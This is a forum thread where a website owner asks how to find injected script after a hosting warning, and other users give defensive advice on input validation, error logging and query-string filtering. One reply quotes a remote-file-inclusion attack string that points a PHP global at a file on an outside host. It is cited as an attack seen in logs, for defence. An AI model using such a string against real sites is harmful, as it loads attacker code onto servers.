Hi I just have been informed by my hosting, that one of my websites is victim of Java Scrpt / Html Script injection. They also require me to look carefully into my whole coding, and I may see the injected code there. I searched all my .php and .html files but have no idea what this injection code should looks like. How can I detect it. I downloaded the whole website into my computer and I'm still looking on my files. I'm thinking to use the search tool I found on windows (start menu). With this tool windows can show me all the files that countain a "word" I previously imput on search. But have no idea what to add there on search. What to tell windows to search inside my website files? I tried "javascript" or "script"...but all the search results are legal scripting codes..part of the script i use. Which is a comon "word" used in codding a javascript/html injection? Maybe if I can tell windows to look for that word, I may detect the injection into my file. Please help!!! Thanks.
you have to see your database. injection in html forms has the purpose of insert, corrupt or catch information from your database.
For the past five months, there has been a deluge of SQL injection attacks, mostly from China, and most exploiting PHP. My main website is written in ASP VBScript so it's funny when I trap these attacks using PHP on a website that doesn't use PHP! Threre's not a lot I can tell you withoiut tipping off the hackers. But I'll tell you this: first, you need to learn how to set up a .htaccess file. And/or, every single server-side scripting fiel you have needs to FIRST call an include file that is an error-catching routine. Then, validate your input. I don't know how PHP handles this, but I'll tell you how I do this in ASP. 1. VALIDATE NUMERIC INPUT AND TRAP I have some pages that are served up by /pagename.asp?pid=5 In my ASP code, I do this: rem The following line assumes "pid" is a number IF Request("pid") > 0 THEN rem do something END IF Simple code, but if pid isn't an integer then the page will crash with an Status 500. I then call a Status 500 routine that logs and emails to me the user's IP address, user agent, HTTP_RAW headers, a bunch of diagnostic Session variables I set including the last SQL statement, etc. Examine these, look for patterns. 2. VALIDATE YOUR QUERY STRINGS This is a common hack attack that I'll see on my query strings: latest.php?GLOBALS[mosConfig_absolute_path]=http://www.example.net/zboard/data/id1.txt?? I get these attacks about 20x a day. BEFORE your code does ANYTHING, EXAMINE THE QUERY STRING for "http". For most applications there is absolutely no reason for an "http" to be in your query string unless it's been manually inserted there by some hacker. If your .htaccess or error-catching routine detects an "http" in your query string, stop serving that user pages and have your application ban his IP address (in ASP this is easy, it's more difficult in PHP). 3. BLOCK CHINA's IP RANGE Admittedly, this isn't a very nice solution as you will block a lot of legetimate users. But it's a solution of last resort only if you don't have the experience to implement the first two. Let me know if this helps!